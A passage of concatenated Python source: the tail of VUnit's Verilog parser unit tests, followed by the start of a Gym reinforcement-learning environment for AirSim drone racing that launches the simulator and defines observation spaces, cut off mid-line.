3) self.assertEqual(modules[0].name, "true1") self.assertEqual(modules[1].name, "true2") self.assertEqual(modules[2].name, "true3") def test_parse_module_with_keyword_name(self): """ We relax the requirement and allow keywords since standards may be mixed. A future enhancement could be to tokenize with awareness of the verilog standard """ modules = self.parse( """\ module global; endmodule module soft; endmodule """ ).modules self.assertEqual(len(modules), 2) self.assertEqual(modules[0].name, "global") self.assertEqual(modules[1].name, "soft") def test_parse_parameter_without_type(self): modules = self.parse( """\ module foo; parameter param1; parameter param2 = 1; endmodule """ ).modules self.assertEqual(len(modules), 1) module = modules[0] self.assertEqual(module.name, "foo") self.assertEqual(len(module.parameters), 2) param1, param2 = module.parameters self.assertEqual(param1, "param1") self.assertEqual(param2, "param2") def test_parse_parameter_with_type(self): modules = self.parse( """\ module foo; parameter string param1; parameter integer param2 = 1; endmodule """ ).modules self.assertEqual(len(modules), 1) module = modules[0] self.assertEqual(module.name, "foo") self.assertEqual(len(module.parameters), 2) param1, param2 = module.parameters self.assertEqual(param1, "param1") self.assertEqual(param2, "param2") def test_nested_modules_are_ignored(self): modules = self.parse( """\ module foo; parameter string param1; module nested; parameter integer param_nested; endmodule parameter string param2; endmodule """ ).modules self.assertEqual(len(modules), 1) module = modules[0] self.assertEqual(module.name, "foo") self.assertEqual(len(module.parameters), 2) param1, param2 = module.parameters self.assertEqual(param1, "param1") self.assertEqual(param2, "param2") def test_parse_package(self): packages = self.parse( """\ package true1; endpackage package true2; endpackage """ ).packages self.assertEqual(len(packages), 2) self.assertEqual(packages[0].name, "true1") self.assertEqual(packages[1].name, "true2") def test_parse_imports(self): imports = self.parse( """\ import true1; package pkg; import true2::*; endpackage """ ).imports self.assertEqual(len(imports), 2) self.assertEqual(imports[0], "true1") self.assertEqual(imports[1], "true2") def test_parse_package_references(self): package_references = self.parse( """\ import false1; import false1::false2::*; package pkg; true1::func(true2::bar()); true3::foo(); endpackage """ ).package_references self.assertEqual(len(package_references), 3) self.assertEqual(package_references[0], "true1") self.assertEqual(package_references[1], "true2") self.assertEqual(package_references[2], "true3") @mock.patch("vunit.parsing.verilog.parser.LOGGER", autospec=True) def test_parse_import_with_bad_argument(self, logger): imports = self.parse( """\ import; """ ).imports self.assertEqual(len(imports), 0) logger.warning.assert_called_once_with( "import bad argument\n%s", "at file_name.sv line 1:\n" "import;\n" " ~" ) @mock.patch("vunit.parsing.verilog.parser.LOGGER", autospec=True) def test_parse_import_eof(self, logger): imports = self.parse( """\ import """ ).imports self.assertEqual(len(imports), 0) logger.warning.assert_called_once_with( "EOF reached when parsing import\n%s", "at file_name.sv line 1:\n" "import\n" "~~~~~~", ) def test_parse_instances(self): instances = self.parse( """\ module name; true1 instance_name1(); true2 instance_name2(.foo(bar)); true3 #(.param(1)) instance_name3(.foo(bar)); endmodule """ ).instances self.assertEqual(len(instances), 3) self.assertEqual(instances[0], "true1") self.assertEqual(instances[1], "true2") self.assertEqual(instances[2], "true3") def test_parse_instances_after_block_label(self): instances = self.parse( """\ module name; genvar i; generate for( i=0; i < 10; i = i + 1 ) begin: INST_GEN true1 instance_name1(); end : INST_GEN true2 instance_name2(); endgenerate endmodule """ ).instances self.assertEqual(len(instances), 2) self.assertEqual(instances[0], "true1") self.assertEqual(instances[1], "true2") def test_parse_instances_without_crashing(self): instances = self.parse( """\ module name; endmodule identifier """ ).instances self.assertEqual(len(instances), 0) def test_can_set_pre_defined_defines(self): code = """\ `ifdef foo `foo endmodule; `endif """ result = self.parse(code, defines={"foo": "module mod1;"}) self.assertEqual(len(result.modules), 1) self.assertEqual(result.modules[0].name, "mod1") def test_result_is_cached(self): code = """\ `include "missing.sv" module name; true1 instance_name1(); true2 instance_name2(.foo(bar)); true3 #(.param(1)) instance_name3(.foo(bar)); endmodule """ cache = {} result = self.parse(code, cache=cache) instances = result.instances self.assertEqual(len(instances), 3) self.assertEqual(instances[0], "true1") self.assertEqual(instances[1], "true2") self.assertEqual(instances[2], "true3") new_result = self.parse(code, cache=cache) self.assertEqual(id(result), id(new_result)) cache.clear() new_result = self.parse(code, cache=cache) self.assertNotEqual(id(result), id(new_result)) def test_cached_parsing_updated_by_changing_file(self): code = """\ module mod1; endmodule """ cache = {} result = self.parse(code, cache=cache) self.assertEqual(len(result.modules), 1) self.assertEqual(result.modules[0].name, "mod1") tick() code = """\ module mod2; endmodule """ result = self.parse(code, cache=cache) self.assertEqual(len(result.modules), 1) self.assertEqual(result.modules[0].name, "mod2") def test_cached_parsing_updated_by_includes(self): self.write_file( "include.svh", """ module mod; endmodule; """, ) code = """\ `include "include.svh" """ cache = {} result = self.parse(code, cache=cache, include_paths=[self.output_path]) self.assertEqual(len(result.modules), 1) self.assertEqual(result.modules[0].name, "mod") tick() self.write_file( "include.svh", """ module mod1; endmodule; module mod2; endmodule; """, ) result = self.parse(code, cache=cache, include_paths=[self.output_path]) self.assertEqual(len(result.modules), 2) self.assertEqual(result.modules[0].name, "mod1") self.assertEqual(result.modules[1].name, "mod2") def test_cached_parsing_updated_by_higher_priority_file(self): cache = {} include_paths = [self.output_path, join(self.output_path, "lower_prio")] self.write_file( join("lower_prio", "include.svh"), """ module mod_lower_prio; endmodule; """, ) code = """\ `include "include.svh" """ result = self.parse(code, cache=cache, include_paths=include_paths) self.assertEqual(len(result.modules), 1) self.assertEqual(result.modules[0].name, "mod_lower_prio") self.write_file( "include.svh", """ module mod_higher_prio; endmodule; """, ) result = self.parse(code, cache=cache, include_paths=include_paths) self.assertEqual(len(result.modules), 1) self.assertEqual(result.modules[0].name, "mod_higher_prio") def test_cached_parsing_updated_by_other_defines(self): cache = {} code = """\ `ifdef foo module `foo endmodule; `endif """ result = self.parse(code, cache=cache) self.assertEqual(len(result.modules), 0) result = self.parse(code, cache=cache, defines={"foo": "mod1"}) self.assertEqual(len(result.modules), 1) self.assertEqual(result.modules[0].name, "mod1") result = self.parse(code, cache=cache, defines={"foo": "mod2"}) self.assertEqual(len(result.modules), 1) self.assertEqual(result.modules[0].name, "mod2") def write_file(self, file_name, contents): """ Write file with contents into output path """ full_name = join(self.output_path, file_name) full_path = dirname(full_name) if not exists(full_path): os.makedirs(full_path) with open(full_name, "w") as fptr: fptr.write(contents) def parse(self, code, include_paths=None, cache=None, defines=None): """ Helper function to parse """ self.write_file("file_name.sv", code) cache = cache if cache is not None else {} parser = VerilogParser(database=cache) include_paths = include_paths if include_paths is not None else [] design_file = parser.parse("file_name.sv", include_paths, defines) return design_file def tick(): """ To get a different file modification time """ time.sleep(0.01) yannbouteiller/gym-airsimdroneracinglab # This is the gym environment core # Several flavors are available # In some flavors, actions are taken at the NEXT time-step (Real Time RL setting) # In some flavors, actions are taken at the CURRENT time-step (usual RL setting) # Some flavors pause the environment between each step (time stop) # Some flavors run continuously (no time control) - for these flavors step() has to be called from a timer # Depending on the values of syncronous_actions and synchronous_states, the simulator can be paused or not to retrieve observations for both drones and send them new actions # To look into how rewards are defined, read rewardfunction.py from gym import Env import gym.spaces as spaces import numpy as np from gym_game_of_drones.envs.multi_agent.gym_airsimdroneracinglab import rewardfunction as rf from gym_game_of_drones.envs.multi_agent.gym_airsimdroneracinglab.custom_airsim_settings_creator import CustomAirSimSettingsCreator import time import random import airsimdroneracinglab as airsim import subprocess import os import signal import pickle import copy from gym_game_of_drones.envs.multi_agent.gym_airsimdroneracinglab.rllib_compatibility_client import LockerClient from collections import deque from threading import Thread from platform import system from pathlib import Path DEFAULT_IP_PORT_FILE_NAME = 'ip_port.obj' SYS_STR = system() if SYS_STR == 'Linux': SUB_DIR = 'ADRL/ADRL/Binaries/Linux' EXECUTABLE_NAME = 'ADRL' OPTIONS_DISPLAY = '-windowed -opengl4' # used with default DISPLAY OPTIONS_WINDOWED_NO_DISPLAY = '-windowed -opengl4 -BENCHMARK' OPTIONS_NO_DISPLAY = '-opengl4 -BENCHMARK' OPTIONS_NO_RENDER = '-nullrhi' # used with DISPLAY="" else: SUB_DIR = 'ADRL/ADRL/Binaries/Win64' EXECUTABLE_NAME = 'ADRL.exe' OPTIONS_DISPLAY = ['-windowed'] # used with default DISPLAY OPTIONS_WINDOWED_NO_DISPLAY = ['-windowed'] OPTIONS_NO_DISPLAY = ['-windowed'] OPTIONS_NO_RENDER = ['-nullrhi'] # used with DISPLAY="" DEFAULT_RENDERING_MODE = 'NO_DISPLAY' # 'WINDOWED_DISPLAY', 'WINDOWED_NO_DISPLAY', 'NO_DISPLAY' or 'NO_RENDER' RESET_TIMEOUT = 10 # seconds before we consider the simulator froze and needs to be killed and launched again DEFAULT_IMG_HEIGHT = 240 DEFAULT_IMG_WIDTH = 320 MAX_GETIMAGES_TRIALS = 100 SLEEP_TIME_AT_RESETRACE = 0.1 DEFAULT_RF_CONFIG = { 'constant_penalty': -1.0, # constant penalty per time-step 'collision_radius': 0.5, # collision with opponent 'velocity_gain': 10.0, # not real velocity: difference of distance to next objective between 2 get_reward() 'gate_crossed_reward': 100.0, 'gate_missed_penalty': -100.0, 'collision_penatly': -10, # collision with environment 'death_penalty': -500, # collision with opponent 'death_constant_penalty': 0.0, # after collision with opponent until the end of track (should be at least lower than constant summed penalty when lagging behind and not moving to avoid reward hacking) 'end_of_track_bonus': 100.0, # only when the last gate is crossed 'lag_penalty': -0.5, # constant additional penalty if not leading the way 'kill_reward': 50.0, 'gate_facing_reward_gain': 1.0 } class IpPort(object): def __init__(self, global_ip_count_1=1, global_ip_count_2=0, global_ip_count_3=0, global_ip_count_4=127, global_port_count=41451): self.global_ip_count_1 = global_ip_count_1 self.global_ip_count_2 = global_ip_count_2 self.global_ip_count_3 = global_ip_count_3 self.global_ip_count_4 = global_ip_count_4 self.global_port_count = global_port_count def print_with_pid(*args): """ helper function: prints along with the process pid for rllib debugging """ pid = os.getpid() print('(', pid, ') ', *args) def initialize_ip_port_file(ip_port_file_name=DEFAULT_IP_PORT_FILE_NAME): """ This should be called prior to creating the first environment """ ip_port = IpPort() f = open(ip_port_file_name, 'wb') pickle.dump(ip_port, f) f.close() def new_client(clockspeed, img_height, img_width, ip_port_file_name=DEFAULT_IP_PORT_FILE_NAME, mode='WINDOWED_DISPLAY', use_locker=True, lock_client=None): """ This function safely creates a new airsim client It can be used to create several clients in parallel a lock server has to be created by the calling process with rllib_compatibility.init_rllib_compatibility_server """ if use_locker: print_with_pid("DEBUG: new_client: waiting for lock...") lock_client.acquire() print_with_pid("DEBUG: new_client: lock acquired") # else: # rand_time = np.random.random() * 100 # print_with_pid(f"DEBUG: sleeping for {rand_time} s before starting") # time.sleep(rand_time) # print_with_pid(f"DEBUG: stopped sleeping") if not Path(ip_port_file_name).is_file(): initialize_ip_port_file(ip_port_file_name) f = open(ip_port_file_name, 'rb') ip_port = pickle.load(f) f.close() port = ip_port.global_port_count ip_str = f"{ip_port.global_ip_count_4}.{ip_port.global_ip_count_3}.{ip_port.global_ip_count_2}.{ip_port.global_ip_count_1}" print_with_pid("DEBUG: ip:", ip_str, ", port:", port) ip_port.global_port_count += 1 if ip_port.global_port_count >= 65535: ip_port.global_port_count = 41451 ip_port.global_ip_count_1 += 1 if ip_port.global_ip_count_1 >= 256: ip_port.global_ip_count_2 += 1 ip_port.global_ip_count_1 = 0 assert ip_port.global_ip_count_2 < 256, "ERROR: too many environments have ben created, IP overflow" f = open(ip_port_file_name, 'wb') pickle.dump(ip_port, f) f.close() my_env = os.environ.copy() # print_with_pid(f"DEBUG: setting SDL_HINT_CUDA_DEVICE to {gpu_str}") my_env["SDL_HINT_CUDA_DEVICE"] = '0' if mode == 'NO_RENDER': # for tier 1 options = OPTIONS_NO_RENDER viewmode = "NoDisplay" my_env["DISPLAY"] = "" elif mode == 'NO_DISPLAY': # for tier 2, 3 options = OPTIONS_NO_DISPLAY viewmode = "NoDisplay" my_env["DISPLAY"] = "" elif mode == 'WINDOWED_NO_DISPLAY': options = OPTIONS_WINDOWED_NO_DISPLAY viewmode = "NoDisplay" else: print("DEBUG: mode = default") options = OPTIONS_DISPLAY viewmode = "FlyWithMe" CustomAirSimSettingsCreator().write_custom_settings_file(clockspeed=clockspeed, ip=ip_str, port=port, img_height=img_height, img_width=img_width, viewmode=viewmode) dir_path = os.path.dirname(os.path.realpath(__file__)) dir_path = os.path.join(dir_path, SUB_DIR, EXECUTABLE_NAME) if SYS_STR == 'Linux': p = subprocess.Popen(dir_path + ' ' + options, bufsize=-1, stdout=None, shell=True, preexec_fn=os.setpgrp, env=my_env) else: p = subprocess.Popen([dir_path] + options, bufsize=-1, stdout=None, shell=False, env=my_env) # subprocess.run([dir_path, options], capture_output=False, shell=False, env=my_env) # p = subprocess.Popen(cmd, creationflags=subprocess.CREATE_NEW_PROCESS_GROUP) print_with_pid("DEBUG: waiting for AirSim to start...") time.sleep(10) # this is to wait for AirSim to load fully print_with_pid("DEBUG: stopped waiting") airsim_client = airsim.MultirotorClient(ip=ip_str, port=port, timeout_value=RESET_TIMEOUT) print_with_pid("DEBUG: confirmConnection()...") airsim_client.confirmConnection() time.sleep(2.0) airsim_client.simDisableRaceLog() if use_locker: print_with_pid("DEBUG: new_client: releasing lock") lock_client.release() return airsim_client, p def basis_oriented_vector(drone_base_orientation, base_vector): """ performs a change of basis for airsim vectors caution: this only *rotates* base_vector """ res = drone_base_orientation.inverse() * base_vector.to_Quaternionr() * drone_base_orientation return airsim.Vector3r(res.x_val, res.y_val, res.z_val) def basis_oriented_quaternion(drone_base_orientation, base_quaternion): """ performs a change of basis for airsim quaternions """ return drone_base_orientation.inverse() * base_quaternion def euler_to_quaternion(roll, pitch, yaw): cy = np.cos(yaw * 0.5) sy = np.sin(yaw * 0.5) cp = np.cos(pitch * 0.5) sp = np.sin(pitch * 0.5) cr = np.cos(roll * 0.5) sr = np.sin(roll * 0.5) return airsim.Quaternionr(x_val=cy * cp * sr - sy * sp * cr, y_val=sy * cp * sr + cy * sp * cr, z_val=sy * cp * cr - cy * sp * sr, w_val=cy * cp * cr + sy * sp * sr) def quaternion_to_roll_pitch_without_yaw(q): # roll (x-axis rotation) sinr_cosp = 2 * (q.w_val * q.x_val + q.y_val * q.z_val) cosr_cosp = 1 - 2 * (q.x_val * q.x_val + q.y_val * q.y_val) roll = np.arctan2(sinr_cosp, cosr_cosp) # pitch (y-axis rotation) sinp = 2 * (q.w_val * q.y_val - q.z_val * q.x_val) if np.abs(sinp) >= 1: pitch = np.copysign(np.pi / 2, sinp) # use 90 degrees if out of range else: pitch = np.arcsin(sinp) return roll, pitch def quaternion_to_yaw(q): # yaw (z-axis rotation) siny_cosp = 2 * (q.w_val * q.z_val + q.x_val * q.y_val) cosy_cosp = 1 - 2 * (q.y_val * q.y_val + q.z_val * q.z_val) yaw = np.arctan2(siny_cosp, cosy_cosp) return yaw def quaternion_to_euler(q): return quaternion_to_roll_pitch_without_yaw(q), quaternion_to_yaw(q) def yaw_to_ned_quaternion(yaw): cy = np.cos(yaw * 0.5) sy = np.sin(yaw * 0.5) return airsim.Quaternionr(x_val=0.0, y_val=0.0, z_val=sy, w_val=cy) def quat_to_ned_quat(q): return yaw_to_ned_quaternion(quaternion_to_yaw(q)) class airsimdroneracinglabEnv(Env): def __init__(self, config): """ gym environment for the airsimdroneracinglab competition This version of the environment is not time-controlled and step() needs to be called repeatedly in a timer (real world setting, for the Real Time RL framework) The length of low_bound and high_bound is the number of actions Parameters are packed in the config dictionary Args (config dictionary keys): airsim_client: airsimdroneracinglab.MultiRotorClient: If None (needed for rllib compatibility), then a client is created by the environement control_method_str: a string that matches the name of the control API you want to use (e.g. 'moveByAngleRatesThrottleAsync'). (add support in _set_control_method_id() and _get_args_kwargs_control_method() and when needed) low_bounds: numpy.array[(numpy.float32),...]: low bounds of all actions high_bounds: numpy.array[(numpy.float32),...]: high bounds of all actions ep_max_length: int: the max length of each episodes in timesteps drones_names: list of strings: list of agents names (optional) tier: int (default 0): competition tier (for access to everything to e.g. build a dataset, use tier 0) (optional) dummy_for_ip_port_file_init: True|False(default): if True, the environment will only be created to initialize the ip_port file. Apart from this specific use, this must be False (optional) rllib_compatibility: True|False(default): if True, the environment will only be initialized at the first reset() call (optional) rendering_mode: 'WINDOWED_DISPLAY'(default), 'WINDOWED_NO_DISPLAY', 'NO_DISPLAY' or 'NO_RENDER' (optional) time_step_method: 'JOIN'(default), 'CONTINUE_FOR_TIME' (optional) locker: True|False: whether a locker server is running and should be used (warning: if False, be sure to isolate workers or the program will attempt dangerous file access) (optional) act_in_obs: bool (default: True): whether the action should be appended to the observation (optional) default_act: action (default: None): action to append to obs at reset when act_in_obs is True (optional) act_preprocessor: function (default: None): preprocessor for individual actions before they are actually applied by step() (optional) obs_preprocessor: function (default: None): preprocessor for individual observations before they are returned by step() (optional) synchronous_actions: bool (default: True): whether time should be paused to apply actions simultaneously (optional) synchronous_states: bool (default: True): whether time should be paused to retrieve observations simultaneously (optional) obs_coord_system: string (default: 'dc'): coordinate system of the observations: 'dc' (fully drone-centric), 'ned' (no pitch/roll), 'global', 'all' (all coordinate systems) (optional) act_coord_system: string (default: 'dc'): coordinate system of the actions: 'dc' (fully drone-centric), 'ned' (no pitch/roll), 'global'. (add support in _get_args_kwargs_control_method() when needed) (optional) rf_config: dict (default: DEFAULT_RF_CONFIG): parameters dictionary of the reward function (optional) time_stop: bool (default: True): whether time should be stopped between steps (optional) real_time: bool (default: False): whether the action are for next time-step instead of current time-step (optional) act_threading: bool (default: True): whether actions are executed asynchronously in the RTRL setting. Set this to True when __apply_action_n() is a I/O operation blocking for the duration of an external time step Typically this is useful for the real world and for external simulators When this is True, __apply_action_n() should be a cpu-light I/O operation or python multithreading will slow down the calling program For cpu-intensive tasks (e.g. embedded simulators), this should be True only if you ensure that the CPU-intensive part is executed in another process while __apply_action_n() is only used for interprocess communications (optional) default_z_target: float (default: 0.0): initial Z target to make Z stabilizing APIs drone/ned-centric action_space is a gym.spaces.Tuple(gym.spaces.Box()) of length nb_drones observation_space is a gym.spaces.Tuple(gym.spaces.Dict()) of length nb_drones """ if "dummy_for_ip_port_file_init" in config and config["dummy_for_ip_port_file_init"] is True: initialize_ip_port_file() print_with_pid("DEBUG: ip_file initialized") return print_with_pid("DEBUG: Creating new environment...") # what is initialized here is what is needed for rllib dummy environments self.config = config self.use_locker = config["use_locker"] if "use_locker" in config else True self.lock_client = LockerClient() if self.use_locker else None self.img_width = config["img_width"] if "img_width" in config else DEFAULT_IMG_WIDTH self.img_height = config["img_height"] if "img_height" in config else DEFAULT_IMG_HEIGHT self.time_stop = config["time_stop"] if "time_stop" in config else True self.real_time = config["real_time"] if "real_time" in config else False self.act_threading = config["act_thread"] if "act_thread" in config else True if not self.real_time: self.act_threading = False if self.act_threading: self._at_thread = Thread(target=None, args=(), kwargs={}, daemon=True) self._at_thread.start() # dummy start for later call to join() self.act_in_obs = config["act_in_obs"] if "act_in_obs" in config else True self.default_act = config["default_act"] if "default_act" in config else None self.act_preprocessor = config["act_preprocessor"] if "act_preprocessor" in config else None self.obs_preprocessor = config["obs_preprocessor"] if "obs_preprocessor" in config else None self.synchronous_actions = config["synchronous_actions"] if "synchronous_actions" in config else True self.synchronous_states = config["synchronous_states"] if "synchronous_states" in config else True self.rf_config = config["rf_config"] if "rf_config" in config else DEFAULT_RF_CONFIG self._set_obs_coord_id(config["obs_coord_system"] if "obs_coord_system" in config else 'dc') self._set_act_coord_id(config["act_coord_system"] if "act_coord_system" in config else 'dc') self.process = None self.drones_names = config["drones_names"] self.nb_drones = len(self.drones_names) self.default_z_target = config["default_z_target"] if "default_z_target" in config else 0.0 self.z_targets = [self.default_z_target, ] * self.nb_drones self.low_bounds = config["low_bounds"] self.high_bounds = config["high_bounds"] self.history_length = config["history_length"] if "history_length" in config else 3 self.tier = config["tier"] if "tier" in config else 0 assert 1 <= self.nb_drones <= 2, "Must have 1 or 2 drones" self.action_space = self._get_action_space() self.observation_space = self._get_observation_space() self.initialized = False # Now in rllib compatibility mode we don't instantiate anything else here if "rllib_compatibility" not in config or not config["rllib_compatibility"]: print_with_pid("DEBUG: No rllib compatibility, initializing envrionement completely...") self._initialize() print_with_pid("DEBUG: New environment created") def _join_act_thread(self): """ This is called at the beginning of every user-side API functions (step(), reset()...) for thread safety In the RTRL setting with action threading, this ensures that the previous time-step is completed when starting a new one """ if self.act_threading: self._at_thread.join() def _apply_action_n(self, *args, **kwargs): """ This is what must be called in step() to apply an action Call this with the args and kwargs expected by self.__apply_action_n() This in turn calls self.__apply_action_n() In RTRL action-threading, self.__apply_action_n() is called in a new Thread """ if not self.act_threading: self.__apply_action_n(*args, **kwargs) else: self._at_thread = Thread(target=self.__apply_action_n, args=args, kwargs=kwargs) self._at_thread.start() def _set_control_method_id(self): """ Each ID corresponds to a pattern in the signature of the API control function If you wish to add support for a new signature pattern, define a new ID here and modify _get_args_kwargs_control_method() accordingly """ if self.control_method_str == 'moveByVelocityAsync': self.control_method_id = 1 elif self.control_method_str == 'moveByRollPitchYawrateZAsync': self.control_method_id = 2 else: # default pattern: actions are directly passed to args self.control_method_id = 0 def _set_obs_coord_id(self, str): if str == 'all': self.obs_coord_id = 0 # all coordinate systems elif str == 'dc': self.obs_coord_id = 1 # drone-centric coordinates elif str == 'ned': self.obs_coord_id = 2 # ned coordinates else: self.obs_coord_id = 3 # global coordinates def _set_act_coord_id(self, str): if str == 'dc': self.act_coord_id = 1 # drone-centric coordinates elif str == 'ned': self.act_coord_id = 2 # ned coordinates else: self.act_coord_id = 3 # global coordinates def _initialize(self): """ This is for rllib compatibility rllib will always create a dummy environment at the beginning just to get the action and observation spaces Of course we don't want a simulator to be instanciated for this dummy environment, so we create it only on the first call of reset() """ self.initialized = True config = self.config if "time_step_method" in config: if config["time_step_method"] == "CONTINUE_FOR_TIME": self.time_step_method_id = 1 else: self.time_step_method_id = 0 else: self.time_step_method_id = 0 self.histories = [] for _ in range(self.nb_drones): self.histories.append(deque(maxlen=self.history_length)) if "rendering_mode" in config: self.rendering_mode = config["rendering_mode"] else: self.rendering_mode = DEFAULT_RENDERING_MODE self.clock_speed = config["clock_speed"] self.airsim_client = config["airsim_client"] if not self.airsim_client: self.airsim_client, self.process = new_client(self.clock_speed, self.img_height, self.img_width, mode=self.rendering_mode, use_locker=self.use_locker, lock_client=self.lock_client) self.control_method_str = config["control_method_str"] self._set_control_method_id() self.control_method = getattr(self.airsim_client, self.control_method_str) self.ep_max_length = config["ep_max_length"] self.simulated_time_step = config["simulated_time_step"] self.cpu_time_step = self.simulated_time_step / self.clock_speed if "level_name" in config: self.level_name = config["level_name"] else: if np.random.randint(2) == 0: self.level_name = 'Soccer_Field_Easy' else: self.level_name = 'Soccer_Field_Medium' self.drones_offsets = config["drones_offsets"] self.current_objectives = None # this is required for reset>RewardFunction to retrieve gate poses only once (because the API for this is prone to bugs) self.airsim_client.simLoadLevel(self.level_name) print_with_pid("DEBUG: confirmConnection()...") self.airsim_client.confirmConnection() # failsafe time.sleep(2) # let the environment load completely obs = self.reset() self.initial_objectives, self.gates_names = self.reward_functions[0].get_objectives() # this is to save the initial configuration of the track self.current_objectives = copy.deepcopy(self.initial_objectives) print_with_pid("DEBUG: environment initialized") return obs def _kill_simulator(self): # TODO: this doesn't work because msgpckrpc/tornado is not properly reset print_with_pid("DEBUG: Killing simulator processes") if SYS_STR == 'Linux': os.killpg(os.getpgid(self.process.pid), signal.SIGKILL) else: os.kill(self.process.pid, 9) def _restart_simulator(self): # TODO: this doesn't work. See _kill_simulator() """ kills the simulator and starts a new instance """ assert self.process is not None, "ERROR: the simulator process has not been started from the environment" self._kill_simulator() self.airsim_client, self.process = new_client(self.clock_speed, self.img_height, self.img_width, mode=self.rendering_mode, use_locker=self.use_locker, lock_client=self.lock_client) self.airsim_client.simLoadLevel(self.level_name) print_with_pid("DEBUG: confirmConnection()...") self.airsim_client.confirmConnection() # failsafe time.sleep(2) # let the environment load completely return self.reset() def _get_action_space(self): # print_with_pid("DEBUG: Getting action space") elt = spaces.Box(self.low_bounds, self.high_bounds) tup = (elt,) * self.nb_drones return spaces.Tuple(tup) def _get_observation_space(self): # print_with_pid("DEBUG: Getting observation space") elt = {} if self.tier <= 1: # ground truth of everything if self.obs_coord_id <= 1: # drone-centric elt['linear_velocity_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_velocity_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['linear_acceleration_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_acceleration_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_position_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_orientation_dc'] = spaces.Box(low=-2.0, high=2.0, shape=(4,)) elt['rival_linear_velocity_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_angular_velocity_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_linear_acceleration_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_angular_acceleration_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['target_position_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['target_orientation_dc'] = spaces.Box(low=-2.0, high=2.0, shape=(4,)) elt['next_target_position_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['next_target_orientation_dc'] = spaces.Box(low=-2.0, high=2.0, shape=(4,)) if self.obs_coord_id == 0 or self.obs_coord_id == 2: # NED elt['linear_velocity_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_velocity_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['linear_acceleration_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_acceleration_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_position_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_orientation_ned'] = spaces.Box(low=-2.0, high=2.0, shape=(4,)) elt['rival_linear_velocity_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_angular_velocity_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_linear_acceleration_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_angular_acceleration_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['target_position_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['target_orientation_ned'] = spaces.Box(low=-2.0, high=2.0, shape=(4,)) elt['next_target_position_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['next_target_orientation_ned'] = spaces.Box(low=-2.0, high=2.0, shape=(4,)) if self.obs_coord_id == 0 or self.obs_coord_id == 3: # global elt['linear_velocity_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_velocity_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['linear_acceleration_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_acceleration_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_position_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_orientation_glo'] = spaces.Box(low=-2.0, high=2.0, shape=(4,)) elt['rival_linear_velocity_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_angular_velocity_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_linear_acceleration_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_angular_acceleration_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['target_position_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['target_orientation_glo'] = spaces.Box(low=-2.0, high=2.0, shape=(4,)) elt['next_target_position_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['next_target_orientation_glo'] = spaces.Box(low=-2.0, high=2.0, shape=(4,)) elt['target_dims_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['next_target_dims_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) if self.tier == 0: elt['front_camera_dc'] = spaces.Box(low=0.0, high=255.0, shape=(self.history_length, self.img_height, self.img_width, 3)) else: # tiers 2 and 3 if self.obs_coord_id <= 1: # drone-centric elt['linear_velocity_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_velocity_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['linear_acceleration_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_acceleration_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) if self.obs_coord_id == 0 or self.obs_coord_id == 2: # NED elt['linear_velocity_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_velocity_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['linear_acceleration_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_acceleration_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) if self.obs_coord_id == 0 or self.obs_coord_id == 3: # global elt['linear_velocity_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_velocity_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['linear_acceleration_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_acceleration_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['front_camera_dc'] = spaces.Box(low=0.0, high=255.0, shape=(self.history_length, self.img_height, self.img_width, 3)) if self.obs_coord_id <= 2: # in 